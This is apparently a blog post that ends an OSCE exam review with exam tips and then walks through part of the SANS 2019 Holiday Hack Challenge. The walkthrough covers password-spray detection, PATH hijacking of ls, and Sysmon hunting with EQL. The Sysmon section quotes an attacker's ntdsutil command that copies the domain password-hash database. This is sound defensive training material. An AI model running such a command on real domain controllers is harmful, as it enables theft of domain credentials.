I’m honestly at a loss for words. This exam was very challenging and taught me a lot of new skills and techniques that I actually utilize day to day on my red team engagements. Sure, this course is more exploit development focused but it still teaches critical thinking and technical skills that can be utilized at your day to day job. I sincerely want to thank OffSec for this amazing experience and opportunity!

Tips & Recommendations

I know that many of you who will be reading this post will ask for tips/recommendations on either preparing to take the OSCE or on how/what to do during the exam. Well not to worry - in this section I will break down and include a lot of the materials I used to prepare for the OSCE as well as some tips/tricks to use for the exam.

Prerequisites:

In the CTP course, OffSec states that you need to understand the following fundamentals to take the course:

Cracking the Perimeter is an advanced course and requires prior knowledge of Windows exploitation techniques. You should be comfortable in OllyDbg and understand concepts such as shellcode encoding, use of the Metasploit Framework, and Linux at large.

Honestly speaking, this is very broad and there are quite a few more skills that you need to have to pass this course. I suggest taking a look at the full syllabus to get a better idea of what you need to know.

These skills are actually tested when you register for the CTP course. You will be provided a link to a web application and will need to pass a two stage registration challenge to even complete the registration. If for any reason you are having trouble completing the challenge, then you need to take a step back and go learn some more basics, because if you can’t pass the registration challenge then you are not ready to attempt the course, let alone the OSCE exam.

If you are somewhat unfamiliar with x86 assembly, shellcoding, web application vulnerabilities, and basic exploitation, then here are some links to help you learn that required material:

I highly suggest that you complete all of the material above before attempting to register for the CTP/OSCE, trust me - you will thank me later if you do!

Practice:

Now that you have a fundamental understanding of the basics, you need to practice… a lot! If you follow the material above, then you should be able to pass the registration challenge and start the CTP course. After the course, I suggest you take the time to read and study additional material before attempting the OSCE exam.

The following materials below will help you practice and expand your skills.

This might seem like a ton of material at first, but do know that these topics will overlap and you will have a better understanding of each after the course. Don’t expect to know or learn this in one week! It will take you at least 2-3 months after your OSCP to be in a good position to go after your OSCE.

Exam Tips:

As with everything, there are certain things that you should know and be doing during the OSCE Exam. The following tips should help you stay focused and steer clear of rabbit holes.

  1. Read the objectives on the OSCE exam slowly, and VERY carefully.
  2. Pay attention to all the little details in the CTP course, the answers to parts of the exam are in there!
  3. Pay attention to all your registers in the debugger. What do they store, where do they point, etc.
  4. If you’re ever doing any calculations on an x86 stack such as aligning pointers, make sure that the calculations are divisible by 4, otherwise you’ll have stack alignment issues!
  5. Learn some hexadecimal arithmetic. The OSCE forum has a good post explaining it!
  6. Access Violation after your shellcode? Check to make sure you didn’t overwrite any important data in your registers or on the stack!
  7. Sometimes a direct approach isn’t feasible. Can you chain attacks to get the final result?
  8. Take frequent breaks. Opt for a 15 minute break every 2 hours.
  9. Eat and drink! Make time for Lunch, and Dinner. Your brain needs food to function.
  10. Organize your notes, take screenshots, and document everything!
  11. You have 48 hours for the exam. Make sure you sleep at least 8 hours. There’s plenty of time to finish!
  12. Don’t give up too easily, and most importantly… “Try Harder!”.
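
Tips 4 and 5 above are easier to internalize with a few lines of code. The following is a minimal sketch, not anything taken from the course or the exam: the helper names and the sample `esp` value are made up for illustration, and it only shows how to round an address to a 4-byte boundary and how 32-bit hexadecimal subtraction wraps around the way a register would.

```python
def align_down(value, boundary=4):
    """Round value down to the nearest multiple of boundary (a power of two)."""
    return value & ~(boundary - 1)


def align_up(value, boundary=4):
    """Round value up to the nearest multiple of boundary (a power of two)."""
    return (value + boundary - 1) & ~(boundary - 1)


def is_aligned(value, boundary=4):
    """True when value is evenly divisible by boundary."""
    return value % boundary == 0


def sub32(a, b):
    """32-bit wrapping subtraction, mimicking what a 32-bit register holds."""
    return (a - b) & 0xFFFFFFFF


if __name__ == "__main__":
    esp = 0x0012F7A3  # hypothetical, deliberately misaligned stack pointer
    print(is_aligned(esp))           # False
    print(hex(align_down(esp)))      # 0x12f7a0
    print(hex(align_up(esp)))        # 0x12f7a4
    print(hex(sub32(0, 0x1000)))     # 0xfffff000
```

Checking an adjusted pointer with something like `is_aligned` before dropping it into an exploit is a cheap way to catch the "math being off" kind of mistake early.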

SANS 2019 Holiday Hack Challenge

23 January 2020 at 00:00

Happy Holidays and a Happy New Year 2020 readers!

Thanks for joining me today as we go over the SANS 2019 Holiday Hack Challenge!

As always, SANS has done an amazing job at making this as fun as possible, while also being very educational!

I also want to give a quick shout out to the amazing Community from the CentralSec Slack Channel and from SANS for always helping everyone out and continuously teaching the community. This is what makes the InfoSec community amazing!

Just a quick heads up - this is a very comprehensive and long post. I will include an Index so you can jump to a certain portion of the challenge if you are only looking for solutions.

For others, the challenges are still available to play through - and will be till next year! So, if you want to follow along, or give it a go by yourself, then you can start here!

Introduction

This year the whole SANS Holiday Hack takes place at Elf University! Upon creating an account, and logging in, you are dropped in front of the ElfU train entrance.

From here, as well as from the Holiday Hack website, we get to follow the story and access our challenges.

The second we arrive at the train station, we are greeted by none other than the man in red himself, Santa!

Once we speak to Santa, we can then enter ElfU and continue on with our challenges (objectives)!

You can access the objectives, hints, talks, and achievements by clicking on the Christmas tree shaped badge on your character.

Objectives:

Once we access our Objectives, we see that we have twelve (12) questions that we need to answer. Hints to these objectives can be obtained by successfully completing the associated Cranberry PI challenge, like every year so far!

The objectives, or questions that need to be answered this year, are as follows:

  1. Talk to Santa in the Quad
    • Enter the campus quad and talk to Santa.
  2. Find the Turtle Doves
    • Find the missing turtle doves.
  3. Unredact Threatening Document
    • Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.
  4. Windows Log Analysis: Evaluate Attack Outcome
    • We’re seeing attacks against the Elf U domain! Using the event log data, identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.
  5. Windows Log Analysis: Determine Attacker Technique
    • Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.
  6. Network Log Analysis: Determine Compromised System
    • The attacks don’t stop! Can you help identify the IP address of the malware-infected system using these Zeek logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.
  7. Splunk
    • Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.
  8. Get Access To The Steam Tunnels
    • Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty’s dorm room and talk with Minty Candy Cane.
  9. Bypassing the Frido Sleigh CAPTEHA
    • Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.
  10. Retrieve Scraps of Paper from Server
    • Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.
  11. Recover Cleartext Document
    • The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use. Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. What is the middle line on the cover page? (Hint: it’s five words) For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.
  12. Open the Sleigh Shop Door
    • Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny? For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.
  13. Filter Out Poisoned Sources of Weather Data

All right, now that we know all that - let’s get into answering the questions!

Objective 0

Talk to Santa in the Quad

Upon exiting the Train Station, we enter The Quad area of the university, where we spot Santa again! Upon talking to him we are presented with the following.

Simple enough, after talking with Santa we complete the very first objective.

Objective 1

Find the Turtle Doves

For this objective we are tasked with finding the missing turtle doves. Simply walking around the campus, and entering the Student Union in the north, we find the two doves by the fireplace.

Clicking on them, we complete the next objective. This is too easy!

Objective 2

Unredact Threatening Document

For this objective, we need to figure out who sent a threatening letter to Elf University, and figure out what the first word in ALL CAPS is, in the subject line of the letter.

We have a hint within the objective that says we can find the letter in the Quad area. So, after walking around in the north-west part of the map we can find the letter!

Clicking on the letter to read it, we are presented with the following.

Darn, it seems this letter has some redacted confidential information which we would need to uncover to read. Well, let’s try the simplest thing we can, and that’s to copy the whole letter, and paste it into a new word document.

Upon doing so, we see that we easily bypass the redaction and are presented with the following text:

To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole

From: A Concerned and Aggrieved Character

Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!


Attention All Elf University Personnel,

It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.

For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.

If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.

Sincerely,

--A Concerned and Aggrieved Character

After reading the document, we can navigate to our objective in our badge and enter the subject word “DEMAND” to complete the challenge.

Objective 3

Escape Ed - CranPi

If we return back to the train station, to the right of Santa we spot Bushy Evergreen!

Upon talking to Bushy, we learn that Pepper forced Bushy to learn how to use the ed text editor and has left Bushy stuck.

Upon accessing the terminal, we are presented with the following output:

                  ........................................
               .;oooooooooooool;,,,,,,,,:loooooooooooooll:
             .:oooooooooooooc;,,,,,,,,:ooooooooooooollooo:
           .';;;;;;;;;;;;;;,''''''''';;;;;;;;;;;;;,;ooooo:
         .''''''''''''''''''''''''''''''''''''''''';ooooo:
       ;oooooooooooool;''''''',:loooooooooooolc;',,;ooooo:
    .:oooooooooooooc;',,,,,,,:ooooooooooooolccoc,,,;ooooo:
  .cooooooooooooo:,''''''',:ooooooooooooolcloooc,,,;ooooo,
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;ooo,
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;l'
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,..
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc.
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooo:.
  coooooooooooooo,,,,,,,,,;ooooooooooooooloo;
  :llllllllllllll,'''''''';llllllllllllllc,
Oh, many UNIX tools grow old, but this one's showing gray.
That Pepper LOLs and rolls her eyes, sends mocking looks my way.
I need to exit, run - get out! - and celebrate the yule.
Your challenge is to help this elf escape this blasted tool.
-Bushy Evergreen
Exit ed.
1110

Alright, so it seems for this terminal challenge we need to simply exit ed. If we google around for an answer we come across a website on how to exit certain editors.

So if we simply type in Q (which quits ed unconditionally, without checking for unsaved changes) and press [ENTER], we should be able to exit the editor.

Q
Loading, please wait......

You did it! Congratulations!

elf@428cacd2b42e:~$

Nice, that was easy!

Windows Log Analysis: Evaluate Attack Outcome

Upon completing the Escape Ed terminal we can talk to Bushy again for more hints that will allow us to complete the next objective.

For this objective, we need to use the event log data to identify the user account that was compromised via a password spray attack.

Looking at the URL for the file download, I see that it has an evtx extension, which is the Windows Event Log file format.

Since this is Windows, let’s download that file in a Windows VM, extract it, and validate the file format.

Awesome, so now that we have the file, we need to analyze the log data somehow. Bushy actually gave us a hint pointing to Eric Conrad’s DeepBlueCLI.

Upon accessing the GitHub repository for DeepBlueCLI, we learn that it is a PowerShell module for threat hunting via Windows Event Logs, so that works great for us!

Let’s go ahead and download that repository to our Windows VM.

PS C:\Users\User\Desktop\Holiday Hack\Security.evtx\DeepBlueCLI\DeepBlueCLI-master> ls                                  

    Directory: C:\Users\User\Desktop\Holiday Hack\Security.evtx\DeepBlueCLI\DeepBlueCLI-master


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/22/2019   1:25 PM                evtx
d-----       12/22/2019   1:25 PM                hashes
d-----       12/22/2019   1:25 PM                READMEs
d-----       12/22/2019   1:25 PM                whitelists
-a----        7/24/2019   2:01 PM             15 .gitattributes
-a----        7/24/2019   2:01 PM          33848 DeepBlue.ps1
-a----        7/24/2019   2:01 PM           4827 DeepBlue.py
-a----        7/24/2019   2:01 PM           2781 DeepWhite-checker.ps1
-a----        7/24/2019   2:01 PM           1689 DeepWhite-collector.ps1
-a----        7/24/2019   2:01 PM          35141 LICENSE
-a----        7/24/2019   2:01 PM           5891 README.md
-a----        7/24/2019   2:01 PM           1673 regexes.txt
-a----        7/24/2019   2:01 PM            352 whitelist.txt

Once we have the tool installed, we need to figure out how to use it to detect a password spraying attack.

Luckily for us, if we scroll through the DeepBlueCLI wiki, we come across an examples table showing us which command we can run and what event it detects. There we spot the password spraying command we need.

So, let’s execute that command against our event log file, and after a few minutes we should see the following data:

PS C:\Users\User\Desktop\Holiday Hack\Security.evtx\DeepBlueCLI\DeepBlueCLI-master> .\DeepBlue.ps1 ..\..\Security.evtx

Date    : 11/19/2019 6:22:46 AM
Log     : Security
EventID : 4648
Message : Distributed Account Explicit Credential Use (Password Spray Attack)
Results : The use of multiple user account access attempts with explicit credentials is an indicator of a password
          spray attack.
          Target Usernames: ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns
          tcandybaubles bbrandyleaves bevergreen lstripyleaves gchocolatewine wopenslae ltrufflefig supatree
          mstripysleigh pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff
          hcandysnaps mbrandybells twinterfig civypears ygreenpie ftinseltoes smary ttinselbubbles dsparkleleaves
          Accessing Username: -
          Accessing Host Name: -

Command :
Decoded :

Date    : 11/19/2019 6:22:40 AM
Log     : Security
EventID : 4648
Message : Distributed Account Explicit Credential Use (Password Spray Attack)
Results : The use of multiple user account access attempts with explicit credentials is an indicator of a password
          spray attack.
          Target Usernames: ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns
          tcandybaubles bbrandyleaves bevergreen lstripyleaves gchocolatewine ltrufflefig wopenslae mstripysleigh
          pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff hcandysnaps
          mbrandybells twinterfig supatree civypears ygreenpie ftinseltoes smary ttinselbubbles dsparkleleaves
          Accessing Username: -
          Accessing Host Name: -

Command :
Decoded :

Date    : 11/19/2019 6:22:34 AM
Log     : Security
EventID : 4648
Message : Distributed Account Explicit Credential Use (Password Spray Attack)
Results : The use of multiple user account access attempts with explicit credentials is an indicator of a password
          spray attack.
          Target Usernames: ygoldentrifle esparklesleigh Administrator sgreenbells cjinglebuns tcandybaubles
          bbrandyleaves bevergreen lstripyleaves gchocolatewine wopenslae ltrufflefig supatree mstripysleigh
          pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff hcandysnaps
          mbrandybells twinterfig smary civypears ygreenpie ftinseltoes hevergreen ttinselbubbles dsparkleleaves
          Accessing Username: -
          Accessing Host Name: -
---snip---

We see a lot of events with Event ID 4648, which indicates that “A logon was attempted using explicit credentials”. If we scroll down a little further, we see other logon events, but this time with Event ID 4672. This event is logged whenever an account assigned any “administrator equivalent” user rights logs on.

Date    : 8/23/2019 7:00:20 PM
Log     : Security
EventID : 4672
Message : Multiple admin logons for one account
Results : Username: DC1$
          User SID Access Count: 12
Command :
Decoded :

Date    : 8/23/2019 7:00:20 PM
Log     : Security
EventID : 4672
Message : Multiple admin logons for one account
Results : Username: supatree
          User SID Access Count: 2
Command :
Decoded :

Date    : 8/23/2019 7:00:20 PM
Log     : Security
EventID : 4672
Message : High number of logon failures for one account
Results : Username: ygoldentrifle
          Total logon failures: 77
Command :
Decoded :

Of all the accounts that were targeted by the password spray, only supatree also appears in the list of accounts with multiple admin logons. So that was the compromised account.
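The reasoning here boils down to a set intersection: sprayed accounts on one side, accounts with admin logons on the other. Here is a minimal Python sketch of that idea, using only the usernames visible in the snipped output above (the real log contains more entries, and the function name is just for illustration).

```python
# Accounts listed under "Target Usernames" in the first 4648 alert above.
sprayed = set("""
ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns
tcandybaubles bbrandyleaves bevergreen lstripyleaves gchocolatewine wopenslae
ltrufflefig supatree mstripysleigh pbrandyberry civysparkles sscarletpie
ftwinklestockings cstripyfluff gcandyfluff smullingfluff hcandysnaps
mbrandybells twinterfig civypears ygreenpie ftinseltoes smary ttinselbubbles
dsparkleleaves
""".split())

# Accounts flagged with "Multiple admin logons for one account" in the
# snippet above (only the entries shown there, not the full log).
admin_logons = {"DC1$", "supatree"}


def compromised_candidates(sprayed_accounts, admin_accounts):
    """Return accounts that were sprayed and also logged on with admin rights."""
    return sorted(sprayed_accounts & admin_accounts)


print(compromised_candidates(sprayed, admin_logons))
```

With the data shown above, the only account in both sets is supatree.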

So we enter supatree into our objective, to complete it.

Objective 4

Linux Path - CranPi

From the train station, we go into the Quad, and take a left into Hermey Hall where we will find SugarPlum Mary.

Talking to SugarPlum we figure out what the challenge consists of, and of course we also get a couple of hints to help in completing the CranPi challenge.

It seems that Mary has a problem with running ls, which is used to list files… hmm. Upon accessing the terminal we see the following:

K000K000K000KK0KKKKKXKKKXKKKXKXXXXXNXXXX0kOKKKK0KXKKKKKKK0KKK0KK0KK0KK0KK0KK0KKKKKK
00K000KK0KKKKKKKKKXKKKXKKXXXXXXXXNXXNNXXooNOXKKXKKXKKKXKKKKKKKKKK0KKKKK0KK0KK0KKKKK
KKKKKKKKKKKXKKXXKXXXXXXXXXXXXXNXNNNNNNK0x:xoxOXXXKKXXKXXKKXKKKKKKKKKKKKKKKKKKKKKKKK
K000KK00KKKKKKKKXXKKXXXXNXXXNXXNNXNNNNNWk.ddkkXXXXXKKXKKXKKXKKXKKXKKXK0KK0KK0KKKKKK
00KKKKKKKKKXKKXXKXXXXXNXXXNXXNNNNNNNNWXXk,ldkOKKKXXXXKXKKXKKXKKXKKKKKKKKKK0KK0KK0XK
KKKXKKKXXKXXXXXNXXXNXXNNXNNNNNNNNNXkddk0No,;;:oKNK0OkOKXXKXKKXKKKKKKKKKKKKK0KK0KKKX
0KK0KKKKKXKKKXXKXNXXXNXXNNXNNNNXxl;o0NNNo,,,;;;;KWWWN0dlk0XXKKXKKXKKXKKKKKKKKKKKKKK
KKKKKKKKXKXXXKXXXXXNXXNNXNNNN0o;;lKNNXXl,,,,,,,,cNNNNNNKc;oOXKKXKKXKKXKKXKKKKKKKKKK
XKKKXKXXXXXXNXXNNXNNNNNNNNN0l;,cONNXNXc',,,,,,,,,KXXXXXNNl,;oKXKKXKKKKKK0KKKKK0KKKX
KKKKKKXKKXXKKXNXXNNXNNNNNXl;,:OKXXXNXc''',,''''',KKKKKKXXK,,;:OXKKXKKXKKX0KK0KK0KKK
KKKKKKKKXKXXXXXNNXXNNNNW0:;,dXXXXXNK:'''''''''''cKKKKKKKXX;,,,;0XKKXKKXKKXKKK0KK0KK
XXKXXXXXXXXXXNNNNNNNNNN0;;;ONXXXXNO,''''''''''''x0KKKKKKXK,',,,cXXKKKKKKKKXKKK0KKKX
KKKKKKKXKKXXXXNNNNWNNNN:;:KNNXXXXO,'.'..'.''..':O00KKKKKXd'',,,,KKXKKXKKKKKKKKKKKKK
KKKKKXKKXXXXXXXXNNXNNNx;cXNXXXXKk,'''.''.''''.,xO00KKKKKO,'',,,,KK0XKKXKKK0KKKKKKKK
XXXXXXXXXKXXXXXXXNNNNNo;0NXXXKKO,'''''''.'.'.;dkOO0KKKK0;.'',,,,XXXKKK0KK0KKKKKKKKX
XKKXXKXXXXXXXXXXXNNNNNcoNNXXKKO,''''.'......:dxkOOO000k,..''',,lNXKXKKXKKK0KKKXKKKK
KXXKKXXXKXXKXXXXXXXNNNoONNXXX0;'''''''''..'lkkkkkkxxxd'...'''',0N0KKKKKXKKKKKK0XKKK
XXXXXKKXXKXXXXXXXXXXXXOONNNXXl,,;;,;;;;;;;d0K00Okddoc,,,,,,,,,xNNOXKKKKKXKKKKKKKXKK
XXXXXXXXXXXXXXXXXXXXXXXONNNXx;;;;;;;;;,,:xO0KK0Oxdoc,,,,,,,,,oNN0KXXKKXKKXKKKKKKKXK
XKXXKXXXXXXXXXXXXXXXXXXXXWNX:;;;;;;;;;,cO0KKKK0Okxl,,,,,,,,,oNNK0NXXXXXXXXXKKKKKKKX
XXXXXXXXXXXXXXXXXXXXXXXNNNWNc;;:;;;;;;xKXXXXXXKK0x,,,,,,,,,dXNK0NXXXXXXXXXXXKKXKKKK
XKXXXXXXXXXXXXXXXXXXXXNNWWNWd;:::;;;:0NNNNNNNNNXO;,,,,,,,:0NN0XNXNXXXXXXXXXXXKKXKKX
NXXXXXXXXXXXXXXXXXXXXXNNNNNNNl:::;;:KNNNNNNNNNNO;,,,,,,;xNNK0NXNXXNXXXXXXKXXKKKKXKK
XXNNXNNNXXXXXXXXXXXXXNNNNNNNNNkl:;;xWWNNNNNWWWk;;;;;;;xNNKKXNXNXXNXXXXXXXXXXXKXKKXK
XXXXXNNNNXNNNNXXXXXXNNNNNNNNNNNNKkolKNNNNNNNNx;;;;;lkNNXNNNNXXXNXXNXXXXXXXXXXXKKKKX
XXXXXXXXXXXNNNNNNNNNNNNNNNNNNNNNNNNNKXNNNNWNo:clxOXNNNNNNNNXNXXXXXXXXXXXXXXXKKXKKKK
XXXXNXXXNXXXNXXNNNNNWWWWWNNNNNNNNNNNNNNNNNWWNWWNWNNWNNNNNNNNXXXXXXNXXXXXXXXXXKKXKKX
XNXXXXNNXXNXXNNXNXNWWWWWWWWWNNNNNNNNNNNNNWWWWNNNNNNNNNNNNNNNNNNNNNXNXXXXNXXXXXXKXKK
XXXXNXXNNXXXNXXNXXNWWWNNNNNNNNNWWNNNNNNNNWWWWWWNWNNNNNNNNNNNNNNNXXNXNXXXXNXXXXKXKXK

I need to list files in my home/
To check on project logos
But what I see with ls there,
Are quotes from desert hobos...

which piece of my command does fail?
I surely cannot find it.
Make straight my path and locate that-
I'll praise your skill and sharp wit!

Get a listing (ls) of your current directory.
elf@5309d6e61bc9:~$

Alright, so the challenge seems pretty simple: we need to get a listing of the current directory by using the ls command. Let’s see what happens when we try to execute ls.

elf@5309d6e61bc9:~$ ls  
This isn't the ls you're looking for

Alright, well that seems to be executing another binary. If you remember back to the questions Mary asked, in #3 she asked “What happens if there are multiple executable with the same name in the $PATH?”.

For those unaware of what a Unix path is, PATH is an environment variable that Linux and other Unix-like operating systems use to tell the shell which directories to search for executable files in response to commands issued by the user.

A user’s PATH consists of a series of colon-separated absolute paths, typically set in plain-text shell configuration files. Whenever a user types in a command that is not built into the shell and does not include a path, and then presses the Enter key, the shell searches through those directories in order. The shell stops at the first directory that contains an executable file with the same name as the command, so an earlier entry takes precedence over a later one.
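To make the lookup order concrete, here is a small Python sketch of roughly what the shell does when resolving a command name. It is a simplification (it ignores shell built-ins, aliases, and the shell's command hash table), and resolve_command is a name made up for this example.

```python
import os


def resolve_command(name, path_value):
    """Return every executable called `name` on the search path, in search order.

    The shell would run the first entry of this list.
    """
    matches = []
    for directory in path_value.split(os.pathsep):
        candidate = os.path.join(directory, name)
        # Only regular files with the execute bit set count as commands.
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            matches.append(candidate)
    return matches


if __name__ == "__main__":
    # On the challenge terminal this would list /usr/local/bin/ls before /bin/ls.
    print(resolve_command("ls", os.environ.get("PATH", "")))
```

If the list has more than one entry, the first one wins, which is exactly why a rogue binary placed in an earlier directory can shadow the real one.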

So knowing that, let’s echo the $PATH environment variable to see our search path.

elf@5309d6e61bc9:~$ echo $PATH  
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Okay, that seems pretty normal to me. Let’s try to find out where the ls binary is actually stored. We can do this by using the whereis command.

elf@5309d6e61bc9:~$ whereis ls  
ls: /bin/ls /usr/local/bin/ls /usr/share/man/man1/ls.1.gz

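Right, so we can see that there are two (2) ls binaries, one in /bin/ls and one in /usr/local/bin/ls. Since /usr/local/bin comes before /bin in our $PATH, the one in /usr/local/bin is what runs when we type ls. Let’s execute each one by its absolute path to find the right one.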

elf@5309d6e61bc9:~$ /usr/local/bin/ls  
This isn't the ls you're looking for  
elf@5309d6e61bc9:~$ /bin/ls  
' '  rejected-elfu-logos.txt  
Loading, please wait......

You did it! Congratulations!

Alright, awesome, we found that the /bin/ls binary is the proper one. So I know that we completed the challenge, but let’s go ahead and fix our $PATH variable so it uses the right binary, and finally we can cat that rejected logo ;).

elf@5309d6e61bc9:~$ export PATH="/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"
elf@5309d6e61bc9:~$ ls
' '   rejected-elfu-logos.txt
elf@5309d6e61bc9:~$ cat rejected-elfu-logos.txt 
        _        
       / \
       \_/
       / \
      /   \
     /    |
    /     |
   /       \
 _/_________|_
 (____________)
Get Elfed at ElfU!
()
  |\__/------\
  \__________/
  Walk a Mile in an elf's shoes
  Take a course at ElfU!
____\()/____
  |    ||    |
  |    ||    |
  |====||====|
  |    ||    |
  |    ||    |
  ------------
Be present in class

And there we have it, we completed the terminal challenge!

Windows Log Analysis: Determine Attacker Technique

Upon successfully completing the Linux Path terminal, we can talk to SugarPlum Mary again for more hints that will allow us to complete the next objective.

For this objective, we need to identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process, by using these normalized Sysmon logs.

Upon downloading the Sysmon logs, we can see that all this data is in a JSON file format.

root@kali:~/HH/sysmon-data# ls -la sysmon-data.json
-rwx------ 1 root root 1886009 Dec  5 15:41 sysmon-data.json

So we need to find the tool that was used to dump the passwords, but we’re not really sure how to parse the Sysmon JSON logs on Linux. If we look back at the hints provided by SugarPlum Mary, we get hints on Sysmon by Carlos Perez and EQL Threat Hunting, as well as a hint to check out some of Ross Wolf’s work on EQL.

After some reading we learn about the EQL tool released by Endgame. The Event Query Language (EQL) is a standardized query language (similar to SQL) for evaluating Windows events. The tool’s main purpose is to normalize Windows log events for consistent access and querying.

Cool, so after reading the information in the GitHub repository, let’s go ahead and install EQL.

root@kali:~/HH/sysmon-data# pip3 install eql

Now that we have the tool installed, we need to figure out how to use it. After reading the EQL Threat Hunting post, we come across a great example of the usage.

We are also provided with an example command showing how to look for regsvr32.exe with EQL.

slingshot $ eql query -f querydata.json "process where process_name = 'regsvr32.exe'"

By using the EQL Query Guide and all the previously listed materials, we learn how to import our JSON data into EQL, and also how to search for specific schemas and the data they contain.

With this, let’s load our data, and see what we can search for inside the process schema.

root@kali:~/HH/sysmon-data# eql
===================
     EQL SHELL     
===================
type help to view more commands
eql> input sysmon-data.json
Using file sysmon-data.json with 2626 events
eql> schema process           
---snip---
 'process': {'command_line': 'string',
             'event_type': 'string',
             'logon_id': 'number',
             'parent_process_name': 'string',
             'parent_process_path': 'string',
             'pid': 'number',
             'ppid': 'number',
             'process_name': 'string',
             'process_path': 'string',
             'subtype': 'string',
             'timestamp': 'number',
             'unique_pid': 'string',
             'unique_ppid': 'string',
             'user': 'string',
             'user_domain': 'string',
             'user_name': 'string'},
---snip---

Alright, so now we know which fields we can query for process events. Since the objective says the hashes were retrieved from the lsass.exe process, let’s search for that name in command_line, as the attacker could have used a tool like ProcDump.

root@kali:~/HH/sysmon-data# eql query -f sysmon-data.json "process where command_line == '*lsass.exe*'"

Hmm… no data was returned. Maybe the attacker used something else? It’s quite possible that the attacker had privileged access to a Windows Domain Controller and used ntdsutil to create an accessible backup of the domain’s password hashes. So let’s see if that was true!

root@kali:~/HH/sysmon-data# eql query -f sysmon-data.json "process where command_line == '*ntds*'" | jq
{
  "command_line": "ntdsutil.exe  \"ac i ntds\" ifm \"create full c:\\hive\" q q",
  "event_type": "process",
  "logon_id": 999,
  "parent_process_name": "cmd.exe",
  "parent_process_path": "C:\\Windows\\System32\\cmd.exe",
  "pid": 3556,
  "ppid": 3440,
  "process_name": "ntdsutil.exe",
  "process_path": "C:\\Windows\\System32\\ntdsutil.exe",
  "subtype": "create",
  "timestamp": 132186398470300000,
  "unique_pid": "{7431d376-dee7-5dd3-0000-0010f0c44f00}",
  "unique_ppid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
  "user": "NT AUTHORITY\\SYSTEM",
  "user_domain": "NT AUTHORITY",
  "user_name": "SYSTEM"
}

And there we have it, ntdsutil was actually used!
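If you don't have EQL handy, the same wildcard filter can be roughly approximated in plain Python. This is only a sketch of the idea behind the query, not how EQL works internally: it assumes the events are already loaded as a list of dictionaries, that matching is case-insensitive, and that patterns only use the * wildcard. The second sample event is hypothetical and exists only so the filter has something to reject.

```python
import fnmatch


def process_where_command_line(events, pattern):
    """Return process events whose command_line matches a *-style wildcard."""
    needle = pattern.lower()
    matches = []
    for event in events:
        if event.get("event_type") != "process":
            continue
        command_line = (event.get("command_line") or "").lower()
        # fnmatchcase also treats ? and [] as wildcards; we only rely on *.
        if fnmatch.fnmatchcase(command_line, needle):
            matches.append(event)
    return matches


events = [
    # Fields copied from the ntdsutil event shown above.
    {"event_type": "process", "process_name": "ntdsutil.exe",
     "command_line": 'ntdsutil.exe  "ac i ntds" ifm "create full c:\\hive" q q'},
    # Hypothetical event, not taken from the challenge data.
    {"event_type": "process", "process_name": "cmd.exe",
     "command_line": "cmd.exe /c whoami"},
]

for hit in process_where_command_line(events, "*ntds*"):
    print(hit["process_name"])
```

Running the same function with the pattern "*lsass.exe*" against these sample events returns an empty list, mirroring the empty result of our first query.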

From here, we can navigate to the fourth objective in our badge and enter “ntdsutil” to complete the objective.

Objective 5

Xmas Cheer Laser - CranPi

From SugarPlum Mary in Hermey Hall, we go left and enter the Laboratory. There we will meet Sparkle Redberry!

Upon talking with Sparkle, we learn that she is having an issue with her laser - which seems to consist of settings in PowerShell.

Upon accessing the terminal we are presented with the following:

WARNGING: ctrl + c restricted in this terminal - Do not use endless loops
Type exit to exit PowerShell.
PowerShell 6.2.3
Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type 'help' to get help.
